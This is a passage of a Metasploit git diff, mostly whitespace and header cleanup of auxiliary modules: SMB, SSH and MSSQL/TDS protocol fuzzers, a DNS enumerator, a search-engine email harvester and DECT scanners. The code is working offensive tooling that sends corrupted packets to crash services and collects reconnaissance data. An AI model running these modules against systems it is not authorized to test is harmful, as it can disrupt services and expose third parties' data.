PROGRAM 1.0', 'LANMAN1.0', 'Windows for Workgroups 3.1a', 'LM1.2X002', 'LANMAN2.1', 'NT LM 0.12', 'SMB 2.002'] diff --git a/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb b/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb index 3070e89dd1..43560f1bb4 100644 --- a/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb +++ b/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb @@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::SMB include Msf::Auxiliary::Fuzzer - + def initialize(info = {}) super(update_info(info, 'Name' => 'SMB Create Pipe Request Fuzzer', @@ -29,7 +29,7 @@ class Metasploit3 < Msf::Auxiliary 'Version' => '$Revision$' )) end - + def do_smb_create(pkt,opts={}) @connected = false connect @@ -37,21 +37,21 @@ class Metasploit3 < Msf::Auxiliary @connected = true smb_create("\\" + pkt) end - + def run last_str = nil last_inp = nil last_err = nil - + cnt = 0 fuzz_strings do |str| cnt += 1 - + if(cnt % 100 == 0) print_status("Fuzzing with iteration #{cnt} using #{@last_fuzzer_input}") end - + begin do_smb_create(str, 0.25) rescue ::Interrupt @@ -62,16 +62,16 @@ class Metasploit3 < Msf::Auxiliary ensure disconnect end - + if(not @connected) if(last_str) print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}") else - print_status("Could not connect to the service: #{last_err}") + print_status("Could not connect to the service: #{last_err}") end return end - + last_str = str last_inp = @last_fuzzer_input end diff --git a/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb index f2d79b8672..aae843d002 100644 --- a/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb +++ b/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb @@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::SMB include Msf::Auxiliary::Fuzzer - + def initialize(info = {}) super(update_info(info, 'Name' => 'SMB Create Pipe Request Corruption', @@ -32,43 +32,43 @@ class Metasploit3 < Msf::Auxiliary OptString.new('SMBPIPE', [true, 'Specify the pipe name to corrupt', "\\BROWSER"]) ], self.class) end - + def do_smb_login(pkt,opts={}) @connected = false connect smb_login - + @connected = true sock.put(pkt) sock.get_once(-1, opts[:timeout]) end - + def run - + # Connect in order to get the server-assigned user-id/tree-id connect smb_login pkt = make_smb_create disconnect - + last_str = nil last_inp = nil last_err = nil - + cnt = 0 - + max = datastore['MAXDEPTH'].to_i max = nil if max == 0 tot = ( max ? [max,pkt.length].min : pkt.length) * 256 - + print_status("Fuzzing SMB create pipe with #{tot} requests") fuzz_string_corrupt_byte_reverse(pkt,max) do |str| cnt += 1 - + if(cnt % 100 == 0) print_status("Fuzzing with iteration #{cnt}/#{tot} using #{@last_fuzzer_input}") end - + begin r = do_smb_login(str, 0.25) rescue ::Interrupt @@ -79,42 +79,42 @@ class Metasploit3 < Msf::Auxiliary ensure disconnect end - + if(not @connected) if(last_str) print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}") else - print_status("Could not connect to the service: #{last_err}") + print_status("Could not connect to the service: #{last_err}") end return end - + last_str = str last_inp = @last_fuzzer_input end end - + def make_smb_create filename = datastore['SMBPIPE'] disposition = 1 impersonation = 2 - + pkt = Rex::Proto::SMB::Constants::SMB_CREATE_PKT.make_struct self.simple.client.smb_defaults(pkt['Payload']['SMB']) - + pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_NT_CREATE_ANDX pkt['Payload']['SMB'].v['Flags1'] = 0x18 pkt['Payload']['SMB'].v['Flags2'] = 0x2001 pkt['Payload']['SMB'].v['WordCount'] = 24 - + pkt['Payload'].v['AndX'] = 255 pkt['Payload'].v['FileNameLen'] = filename.length pkt['Payload'].v['CreateFlags'] = 0x16 pkt['Payload'].v['AccessMask'] = 0x02000000 # Maximum Allowed pkt['Payload'].v['ShareAccess'] = 7 pkt['Payload'].v['CreateOptions'] = 0 - pkt['Payload'].v['Impersonation'] = impersonation + pkt['Payload'].v['Impersonation'] = impersonation pkt['Payload'].v['Disposition'] = disposition pkt['Payload'].v['Payload'] = filename + "\x00" pkt.to_s diff --git a/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb index 487debedf6..aa9deb06e0 100644 --- a/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb +++ b/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb @@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer - + def initialize(info = {}) super(update_info(info, 'Name' => 'SMB Negotiate Dialect Corruption', @@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary OptInt.new('MAXDEPTH', [false, 'Specify a maximum byte depth to test']) ], self.class) end - + def do_smb_negotiate(pkt,opts={}) @connected = false connect @@ -40,27 +40,27 @@ class Metasploit3 < Msf::Auxiliary sock.put(pkt) sock.get_once(-1, opts[:timeout]) end - + def run last_str = nil last_inp = nil last_err = nil - + pkt = make_smb_negotiate cnt = 0 - + max = datastore['MAXDEPTH'].to_i max = nil if max == 0 tot = ( max ? [max,pkt.length].min : pkt.length) * 256 - + print_status("Fuzzing SMB negotiate packet with #{tot} requests") fuzz_string_corrupt_byte_reverse(pkt,max) do |str| cnt += 1 - + if(cnt % 100 == 0) print_status("Fuzzing with iteration #{cnt}/#{tot} using #{@last_fuzzer_input}") end - + begin r = do_smb_negotiate(str, 0.25) rescue ::Interrupt @@ -71,21 +71,21 @@ class Metasploit3 < Msf::Auxiliary ensure disconnect end - + if(not @connected) if(last_str) print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}") else - print_status("Could not connect to the service: #{last_err}") + print_status("Could not connect to the service: #{last_err}") end return end - + last_str = str last_inp = @last_fuzzer_input end end - + def make_smb_negotiate # The SMB 2 dialect must be there dialects = ['PC NETWORK PROGRAM 1.0', 'LANMAN1.0', 'Windows for Workgroups 3.1a', 'LM1.2X002', 'LANMAN2.1', 'NT LM 0.12'] diff --git a/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb index 57d40f8885..9abf2f2b21 100644 --- a/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb +++ b/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb @@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::SMB include Msf::Auxiliary::Fuzzer - + def initialize(info = {}) super(update_info(info, 'Name' => 'SMB NTLMv1 Login Request Corruption', @@ -33,37 +33,37 @@ class Metasploit3 < Msf::Auxiliary OptInt.new('MAXDEPTH', [false, 'Specify a maximum byte depth to test']) ], self.class) end - + def do_smb_login(pkt,opts={}) @connected = false connect simple.client.negotiate(false) - + @connected = true sock.put(pkt) sock.get_once(-1, opts[:timeout]) end - + def run last_str = nil last_inp = nil last_err = nil - + pkt = make_smb_login cnt = 0 - + max = datastore['MAXDEPTH'].to_i max = nil if max == 0 tot = ( max ? [max,pkt.length].min : pkt.length) * 256 - + print_status("Fuzzing SMB login with #{tot} requests") fuzz_string_corrupt_byte_reverse(pkt,max) do |str| cnt += 1 - + if(cnt % 100 == 0) print_status("Fuzzing with iteration #{cnt}/#{tot} using #{@last_fuzzer_input}") end - + begin r = do_smb_login(str, 0.25) rescue ::Interrupt @@ -74,23 +74,23 @@ class Metasploit3 < Msf::Auxiliary ensure disconnect end - + if(not @connected) if(last_str) print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}") else - print_status("Could not connect to the service: #{last_err}") + print_status("Could not connect to the service: #{last_err}") end return end - + last_str = str last_inp = @last_fuzzer_input end end - + def make_smb_login - + user = "USER" domain = "DOMAIN" hash_lm = Rex::Proto::SMB::Crypt.lanman_des("X", "X" * 8) @@ -102,10 +102,10 @@ class Metasploit3 < Msf::Auxiliary data << user + "\x00" data << domain + "\x00" data << 'Windows 2000 2195' + "\x00" - data << 'Windows 2000 5.0' + "\x00" - + data << 'Windows 2000 5.0' + "\x00" + pkt = Rex::Proto::SMB::Constants::SMB_SETUP_NTLMV1_PKT.make_struct - + pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_SESSION_SETUP_ANDX pkt['Payload']['SMB'].v['Flags1'] = 0x18 pkt['Payload']['SMB'].v['Flags2'] = 0x2001 @@ -113,7 +113,7 @@ class Metasploit3 < Msf::Auxiliary pkt['Payload'].v['AndX'] = 255 pkt['Payload'].v['MaxBuff'] = 0xffdf pkt['Payload'].v['MaxMPX'] = 2 - pkt['Payload'].v['VCNum'] = 1 + pkt['Payload'].v['VCNum'] = 1 pkt['Payload'].v['PasswordLenLM'] = hash_lm.length pkt['Payload'].v['PasswordLenNT'] = hash_nt.length pkt['Payload'].v['Capabilities'] = 64 diff --git a/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb b/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb index d75b407036..facd1c6265 100644 --- a/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb +++ b/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb @@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer - + def initialize(info = {}) super(update_info(info, 'Name' => 'SSH 1.5 Version Fuzzer', @@ -31,34 +31,34 @@ class Metasploit3 < Msf::Auxiliary Opt::RPORT(22) ], self.class) end - + def do_ssh_version(pkt,opts={}) @connected = false connect @connected = true - + @banner = sock.get_once(-1,opts[:banner_timeout]) return if not @banner sock.put("#{pkt}\r\n") end - + def run last_str = nil last_inp = nil last_err = nil - + ver = make_ssh_version_base cnt = 0 - + fuzz_strings do |str| cnt += 1 - + pkt = ver + str - + if(cnt % 100 == 0) print_status("Fuzzing with iteration #{cnt} using #{@last_fuzzer_input}") end - + begin r = do_ssh_version(str,:banner_timeout => 5) rescue ::Interrupt @@ -69,16 +69,16 @@ class Metasploit3 < Msf::Auxiliary ensure disconnect end - + if(not @connected) if(last_str) print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}") else - print_status("Could not connect to the service: #{last_err}") + print_status("Could not connect to the service: #{last_err}") end return end - + if(not @banner) print_status("The service may have crashed (no banner): iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} ") return @@ -88,7 +88,7 @@ class Metasploit3 < Msf::Auxiliary last_inp = @last_fuzzer_input end end - + def make_ssh_version_base "SSH-1.5-" end diff --git a/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb b/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb index a5db375c7b..772c505ba2 100644 --- a/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb +++ b/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb @@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer - + def initialize(info = {}) super(update_info(info, 'Name' => 'SSH 2.0 Version Fuzzer', @@ -31,34 +31,34 @@ class Metasploit3 < Msf::Auxiliary Opt::RPORT(22) ], self.class) end - + def do_ssh_version(pkt,opts={}) @connected = false connect @connected = true - + @banner = sock.get_once(-1,opts[:banner_timeout]) return if not @banner sock.put("#{pkt}\r\n") end - + def run last_str = nil last_inp = nil last_err = nil - + ver = make_ssh_version_base cnt = 0 - + fuzz_strings do |str| cnt += 1 - + pkt = ver + str - + if(cnt % 100 == 0) print_status("Fuzzing with iteration #{cnt} using #{@last_fuzzer_input}") end - + begin r = do_ssh_version(str,:banner_timeout => 5) rescue ::Interrupt @@ -69,16 +69,16 @@ class Metasploit3 < Msf::Auxiliary ensure disconnect end - + if(not @connected) if(last_str) print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}") else - print_status("Could not connect to the service: #{last_err}") + print_status("Could not connect to the service: #{last_err}") end return end - + if(not @banner) print_status("The service may have crashed (no banner): iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} ") return @@ -88,7 +88,7 @@ class Metasploit3 < Msf::Auxiliary last_inp = @last_fuzzer_input end end - + def make_ssh_version_base "SSH-2.0-" end diff --git a/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb b/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb index 563165f4a5..0da62810b3 100644 --- a/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb +++ b/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb @@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer - + def initialize(info = {}) super(update_info(info, 'Name' => 'SSH Version Corruption', @@ -32,37 +32,37 @@ class Metasploit3 < Msf::Auxiliary OptInt.new('MAXDEPTH', [false, 'Specify a maximum byte depth to test']) ], self.class) end - + def do_ssh_version(pkt,opts={}) @connected = false connect @connected = true - + @banner = sock.get_once(-1,opts[:banner_timeout]) return if not @banner sock.put("#{pkt}\r\n") end - + def run last_str = nil last_inp = nil last_err = nil - + pkt = make_ssh_version cnt = 0 - + max = datastore['MAXDEPTH'].to_i max = nil if max == 0 tot = ( max ? [max,pkt.length].min : pkt.length) * 256 - + print_status("Fuzzing SSH version string with #{tot} requests") fuzz_string_corrupt_byte_reverse(pkt,max) do |str| cnt += 1 - + if(cnt % 100 == 0) print_status("Fuzzing with iteration #{cnt}/#{tot} using #{@last_fuzzer_input}") end - + begin r = do_ssh_version(str,:banner_timeout => 5) rescue ::Interrupt @@ -73,16 +73,16 @@ class Metasploit3 < Msf::Auxiliary ensure disconnect end - + if(not @connected) if(last_str) print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}") else - print_status("Could not connect to the service: #{last_err}") + print_status("Could not connect to the service: #{last_err}") end return end - + if(not @banner) print_status("The service may have crashed (no banner): iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} ") return @@ -92,7 +92,7 @@ class Metasploit3 < Msf::Auxiliary last_inp = @last_fuzzer_input end end - + def make_ssh_version "SSH-2.0-OpenSSH_5.1p1 Debian-5ubuntu1" end diff --git a/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb b/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb index e79d655b6c..d8ed8b7eef 100644 --- a/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb +++ b/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb @@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Fuzzer - + def initialize(info = {}) super(update_info(info, 'Name' => 'TDS Protocol Login Request Corruption Fuzzer', @@ -31,11 +31,11 @@ class Metasploit3 < Msf::Auxiliary # A copy of the mssql_login method with the ability to overload each option def make_login(opts={}) - + pkt = "" idx = 0 db = "" - + pkt << [ 0x00000000, # Dummy size opts[:tds_version] || 0x71000001, # TDS Version @@ -50,42 +50,42 @@ class Metasploit3 < Msf::Auxiliary opts[:timezone] || 0x00000000, # Time Zone opts[:collation] || 0x00000000 # Collation ].pack('VVVVVVCCCCVV') - - + + cname = Rex::Text.to_unicode( opts[:cname] || Rex::Text.rand_text_alpha(rand(8)+1) ) uname = Rex::Text.to_unicode( opts[:uname] || "sa" ) pname = opts[:pname_raw] || mssql_tds_encrypt( opts[:pname] || "" ) - aname = Rex::Text.to_unicode(opts[:aname] || Rex::Text.rand_text_alpha(rand(8)+1) ) + aname = Rex::Text.to_unicode(opts[:aname] || Rex::Text.rand_text_alpha(rand(8)+1) ) sname = Rex::Text.to_unicode( opts[:sname] || rhost ) dname = Rex::Text.to_unicode( opts[:dname] || db ) - + idx = pkt.size + 50 # lengths below - + pkt << [idx, cname.length / 2].pack('vv') idx += cname.length - + pkt << [idx, uname.length / 2].pack('vv') - idx += uname.length - + idx += uname.length + pkt << [idx, pname.length / 2].pack('vv') idx += pname.length pkt << [idx, aname.length / 2].pack('vv') - idx += aname.length - + idx += aname.length + pkt << [idx, sname.length / 2].pack('vv') idx += sname.length - + pkt << [0, 0].pack('vv') - + pkt << [idx, aname.length / 2].pack('vv') - idx += aname.length + idx += aname.length pkt << [idx, 0].pack('vv') - + pkt << [idx, dname.length / 2].pack('vv') - idx += dname.length - + idx += dname.length + # The total length has to be embedded twice more here pkt << [ 0, @@ -93,15 +93,15 @@ class Metasploit3 < Msf::Auxiliary 0x12345678, 0x12345678 ].pack('vVVV') - + pkt << cname pkt << uname pkt << pname - pkt << aname + pkt << aname pkt << sname pkt << aname pkt << dname - + # Total packet length pkt[0,4] = [pkt.length].pack('V') @@ -113,34 +113,34 @@ class Metasploit3 < Msf::Auxiliary pkt end - + def do_login(pkt,opts={}) @connected = false disconnect if self.sock connect @connected = true - + resp = mssql_send_recv(pkt,opts[:timeout]) - + info = {:errors => []} info = mssql_parse_reply(resp,info) info end - + def run last_str = nil last_inp = nil last_err = nil - + pkt = make_login cnt = 0 fuzz_string_corrupt_byte_reverse(pkt) do |str| cnt += 1 - + if(cnt % 100 == 0) print_status("Fuzzing with iteration #{cnt} using #{@last_fuzzer_input}") end - + begin do_login(str,:timeout => 0.50) rescue ::Interrupt @@ -151,12 +151,12 @@ class Metasploit3 < Msf::Auxiliary ensure disconnect end - + if(not @connected) if(last_str) print_status("The service may have crashed: method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}") else - print_status("Could not connect to the service: #{last_err}") + print_status("Could not connect to the service: #{last_err}") end return end diff --git a/modules/auxiliary/fuzzers/tds/tds_login_username.rb b/modules/auxiliary/fuzzers/tds/tds_login_username.rb index ddf05286a3..27f8403e04 100644 --- a/modules/auxiliary/fuzzers/tds/tds_login_username.rb +++ b/modules/auxiliary/fuzzers/tds/tds_login_username.rb @@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Fuzzer - + def initialize(info = {}) super(update_info(info, 'Name' => 'TDS Protocol Login Request Username Fuzzer', @@ -31,16 +31,16 @@ class Metasploit3 < Msf::Auxiliary # A copy of the mssql_login method with the ability to overload each option def do_login(opts={}) - + @connected = false disconnect if self.sock connect @connected = true - + pkt = "" idx = 0 db = "" - + pkt << [ 0x00000000, # Dummy size opts[:tds_version] || 0x71000001, # TDS Version @@ -55,42 +55,42 @@ class Metasploit3 < Msf::Auxiliary opts[:timezone] || 0x00000000, # Time Zone opts[:collation] || 0x00000000 # Collation ].pack('VVVVVVCCCCVV') - - + + cname = Rex::Text.to_unicode( opts[:cname] || Rex::Text.rand_text_alpha(rand(8)+1) ) uname = Rex::Text.to_unicode( opts[:uname] || "sa" ) pname = opts[:pname_raw] || mssql_tds_encrypt( opts[:pname] || "" ) - aname = Rex::Text.to_unicode(opts[:aname] || Rex::Text.rand_text_alpha(rand(8)+1) ) + aname = Rex::Text.to_unicode(opts[:aname] || Rex::Text.rand_text_alpha(rand(8)+1) ) sname = Rex::Text.to_unicode( opts[:sname] || rhost ) dname = Rex::Text.to_unicode( opts[:dname] || db ) - + idx = pkt.size + 50 # lengths below - + pkt << [idx, cname.length / 2].pack('vv') idx += cname.length - + pkt << [idx, uname.length / 2].pack('vv') - idx += uname.length - + idx += uname.length + pkt << [idx, pname.length / 2].pack('vv') idx += pname.length pkt << [idx, aname.length / 2].pack('vv') - idx += aname.length - + idx += aname.length + pkt << [idx, sname.length / 2].pack('vv') idx += sname.length - + pkt << [0, 0].pack('vv') - + pkt << [idx, aname.length / 2].pack('vv') - idx += aname.length + idx += aname.length pkt << [idx, 0].pack('vv') - + pkt << [idx, dname.length / 2].pack('vv') - idx += dname.length - + idx += dname.length + # The total length has to be embedded twice more here pkt << [ 0, @@ -98,15 +98,15 @@ class Metasploit3 < Msf::Auxiliary 0x12345678, 0x12345678 ].pack('vVVV') - + pkt << cname pkt << uname pkt << pname - pkt << aname + pkt << aname pkt << sname pkt << aname pkt << dname - + # Total packet length pkt[0,4] = [pkt.length].pack('V') @@ -117,27 +117,27 @@ class Metasploit3 < Msf::Auxiliary pkt = "\x10\x01" + [pkt.length + 8].pack('n') + [0].pack('n') + [1].pack('C') + "\x00" + pkt resp = mssql_send_recv(pkt,opts[:timeout]) - + info = {:errors => []} info = mssql_parse_reply(resp,info) info end - + def run last_str = nil last_inp = nil last_err = nil - + cnt = 0 fuzz_strings do |str| # capped at 16-bit lengths next if str.length > 65535 cnt += 1 - + if(cnt % 100 == 0) print_status("Fuzzing with iteration #{cnt} using #{@last_fuzzer_input}") end - + begin do_login(:uname => str, :timeout => 0.50) rescue ::Interrupt @@ -148,12 +148,12 @@ class Metasploit3 < Msf::Auxiliary ensure disconnect end - + if(not @connected) if(last_str) print_status("The service may have crashed: method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}") else - print_status("Could not connect to the service: #{last_err}") + print_status("Could not connect to the service: #{last_err}") end return end diff --git a/modules/auxiliary/gather/dns_enum.rb b/modules/auxiliary/gather/dns_enum.rb index f965748990..c38575416b 100644 --- a/modules/auxiliary/gather/dns_enum.rb +++ b/modules/auxiliary/gather/dns_enum.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -5,28 +9,28 @@ # http://metasploit.com/framework/ ## - require 'msf/core' - require "net/dns/resolver" class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report + def initialize(info = {}) super(update_info(info, - 'Name' => 'DNS Enumeration Module', - 'Description' => %q{ + 'Name' => 'DNS Enumeration Module', + 'Description' => %q{ This module can be used to enumerate various types of information about a domain from a specific DNS server. - }, - 'Author' => [ 'Carlos Perez ' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$', - 'References' => - [ - ['CVE', '1999-0532'], - ] - )) + }, + 'Author' => [ 'Carlos Perez ' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision$', + 'References' => + [ + ['CVE', '1999-0532'], + ] + )) + register_options( [ OptString.new('DOMAIN', [ true, "The target domain name"]), @@ -42,6 +46,7 @@ class Metasploit3 < Msf::Auxiliary OptAddressRange.new('IPRANGE', [false, "The target address range or CIDR identifier"]), OptBool.new('STOP_WLDCRD', [ true, 'Stops Brute Force Enumeration if wildcard resolution is detected', false]) ], self.class) + register_advanced_options( [ OptInt.new('THREADS', [ false, "Number of threads to use when using ENUM_BRT, ENUM_TLD, and ENUM_RVL checks", 10]), @@ -248,7 +253,7 @@ class Metasploit3 < Msf::Auxiliary end a.delete_if {|x| not x.alive?} while not a.empty? end - + #------------------------------------------------------------------------------- def bruteipv6(target, wordlist, nssrv) print_status("Brute Forcing IPv6 addresses against Domain #{target}") @@ -493,7 +498,7 @@ class Metasploit3 < Msf::Auxiliary dnsbrute(datastore['DOMAIN'],datastore['WORDLIST'],datastore['NS']) end end - + if(datastore['ENUM_IP6']) if wldcrd & datastore['STOP_WLDCRD'] print_status("Wilcard Record Found!") diff --git a/modules/auxiliary/gather/search_email_collector.rb b/modules/auxiliary/gather/search_email_collector.rb index fbfb2c106c..22b89da109 100644 --- a/modules/auxiliary/gather/search_email_collector.rb +++ b/modules/auxiliary/gather/search_email_collector.rb @@ -1,4 +1,7 @@ -#!/usr/bin/env ruby +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -6,22 +9,23 @@ # http://metasploit.com/framework/ ## - require 'msf/core' require 'net/http' class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report + def initialize(info = {}) super(update_info(info, 'Name' => 'Search Engine Domain Email Address Collector', 'Description' => %q{ - This module uses Google, Bing and Yahoo to create a list of - valid email addresses for the target domain. + This module uses Google, Bing and Yahoo to create a list of + valid email addresses for the target domain. }, 'Author' => [ 'Carlos Perez ' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$')) + register_options( [ OptString.new('DOMAIN', [ true, "The domain name to locate email addresses for"]), @@ -29,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary OptBool.new('SEARCH_BING', [ true, 'Enable Bing as a backend search engine', true]), OptBool.new('SEARCH_YAHOO', [ true, 'Enable Yahoo! as a backend search engine', true]), OptString.new('OUTFILE', [ false, "A filename to store the generated email list"]), - + ], self.class) register_advanced_options( @@ -60,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary end return emails.uniq end - + #Search Yahoo.com for email's of target domain def search_yahoo(targetdom) print_status("Searching Yahoo for email addresses from #{targetdom}") @@ -81,7 +85,7 @@ class Metasploit3 < Msf::Auxiliary end return emails.uniq end - + #Search Bing.com for email's of target domain def search_bing(targetdom) print_status("Searching Bing email addresses from #{targetdom}") @@ -105,15 +109,15 @@ class Metasploit3 < Msf::Auxiliary end return emails.uniq end - + #for writing file with all email's found def write_output(data) - print_status("Writing email address list to #{datastore['OUTFILE']}...") + print_status("Writing email address list to #{datastore['OUTFILE']}...") ::File.open(datastore['OUTFILE'], "a") do |fd| fd.write(data) end end - + def run if datastore['PROXY'] @proxysrv,@proxyport = datastore['PROXY'].split(":") @@ -123,7 +127,7 @@ class Metasploit3 < Msf::Auxiliary @proxysrv,@proxyport = nil, nil end print_status("Harvesting emails .....") - + target = datastore['DOMAIN'] @@ -139,7 +143,7 @@ class Metasploit3 < Msf::Auxiliary emails.each do |e| print_status("\t#{e.to_s}") end - + write_output(emails.join("\n")) if datastore['OUTFILE'] end end diff --git a/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb b/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb index b0d6aae3d1..a3f0a04607 100644 --- a/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb +++ b/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -5,10 +9,8 @@ # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/scanner/dect/call_scanner.rb b/modules/auxiliary/scanner/dect/call_scanner.rb index 1bf1c7d434..e8bcd5b29d 100644 --- a/modules/auxiliary/scanner/dect/call_scanner.rb +++ b/modules/auxiliary/scanner/dect/call_scanner.rb @@ -1,10 +1,20 @@ -require 'msf/core' +## +# $Id$ +## +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::DECT_COA - + def initialize super( 'Name' => 'DECT Call Scanner', @@ -13,7 +23,7 @@ class Metasploit3 < Msf::Auxiliary 'Author' => [ 'DK ' ], 'License' => MSF_LICENSE, 'References' => [ ['Dedected', 'http://www.dedected.org'] ] - ) + ) register_options([ OptBool.new('VERBOSE',[false, 'Print out verbose information during the scan', true]) ], self.class ) @@ -23,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary print_line("Time\t\t\t\tRFPI\t\tChannel") @calls.each do |rfpi, data| print_line("#{data['time']}\t#{data['rfpi']}\t#{data['channel']}") - end + end end @@ -34,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary while(true) data = poll_coa() puts data - end + end end =end @@ -43,9 +53,9 @@ class Metasploit3 < Msf::Auxiliary print_status("Opening interface: #{datastore['INTERFACE']}") print_status("Using band: #{datastore['band']}") - + open_coa - + begin print_status("Changing to call scan mode.") @@ -73,7 +83,7 @@ class Metasploit3 < Msf::Auxiliary stop_coa() close_coa() end - + print_results end end diff --git a/modules/auxiliary/scanner/dect/station_scanner.rb b/modules/auxiliary/scanner/dect/station_scanner.rb index f517931a07..c7be03068d 100644 --- a/modules/auxiliary/scanner/dect/station_scanner.rb +++ b/modules/auxiliary/scanner/dect/station_scanner.rb @@ -1,10 +1,20 @@ -require 'msf/core' +## +# $Id$ +## +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::DECT_COA - + def initialize super( 'Name' => 'DECT Base Station Scanner', @@ -13,29 +23,29 @@ class Metasploit3 < Msf::Auxiliary 'Author' => [ 'DK ' ], 'License' => MSF_LICENSE, 'References' => [ ['Dedected', 'http://www.dedected.org'] ] - ) - + ) + register_options([ OptBool.new('VERBOSE',[false, 'Print out verbose information during the scan', true]) ], self.class ) end - + def print_results print_line("RFPI\t\tChannel") @base_stations.each do |rfpi, data| print_line("#{data['rfpi']}\t#{data['channel']}") - end + end end def run @base_stations = {} - + print_status("Opening interface: #{datastore['INTERFACE']}") print_status("Using band: #{datastore['band']}") - + open_coa - + begin print_status("Changing to fp scan mode.") @@ -59,13 +69,13 @@ class Metasploit3 < Msf::Auxiliary print_status("Switching to channel: #{channel}") end sleep(1) - end + end ensure print_status("Closing interface") stop_coa() close_coa() end - + print_results end end diff --git 